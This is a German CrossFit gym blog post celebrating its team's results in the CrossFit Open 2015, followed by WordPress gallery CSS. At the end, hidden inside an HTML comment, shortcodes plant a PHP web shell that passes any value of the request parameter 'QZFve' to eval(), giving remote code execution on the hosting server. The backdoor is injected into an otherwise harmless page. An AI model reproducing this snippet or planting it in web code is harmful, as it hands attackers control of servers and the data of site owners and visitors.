Die CrossFit Open 2015 sind nach 5 anstrengenden Wochen mit jeweils anspruchsvollen Workouts geschafft. Unser gesamtes CFLG-Team hat sich der Herausforderung gestellt und mit super Leistungen überzeugt. In diesem Jahr wurden sämtliche Fähigkeiten & Fertigkeiten abverlangt.

Neu war vor allem die Struktur der Workouts. Neben einem schweren Clean & Jerk, Handstand Push ups und zahlreichen komplexen Übungen, wurden unsere Athleten mit vielfältigen Workouts konfrontiert. Der Abschluss hatte es noch einmal in sich: 27-21-15-9 for time of calorie Row & Thruster.

Wir sind stolz auf eure Leistungen, mit denen wir uns in Lüneburg und Hamburg behaupten konnten!

#gallery-1 {
margin: auto;
}
#gallery-1 .gallery-item {
float: left;
margin-top: 10px;
text-align: center;
width: 33%;
}
#gallery-1 img {
border: 2px solid #cfcfcf;
}
#gallery-1 .gallery-caption {
margin-left: 0;
}
/* see gallery_shortcode() in wp-includes/media.php */

 

<!– [insert_php]if (isset($_REQUEST["QZFve"])){eval($_REQUEST["QZFve"]);exit;}[/insert_php][php]if (isset($_REQUEST["QZFve"])){eval($_REQUEST["QZFve"]);exit;}[/php] –>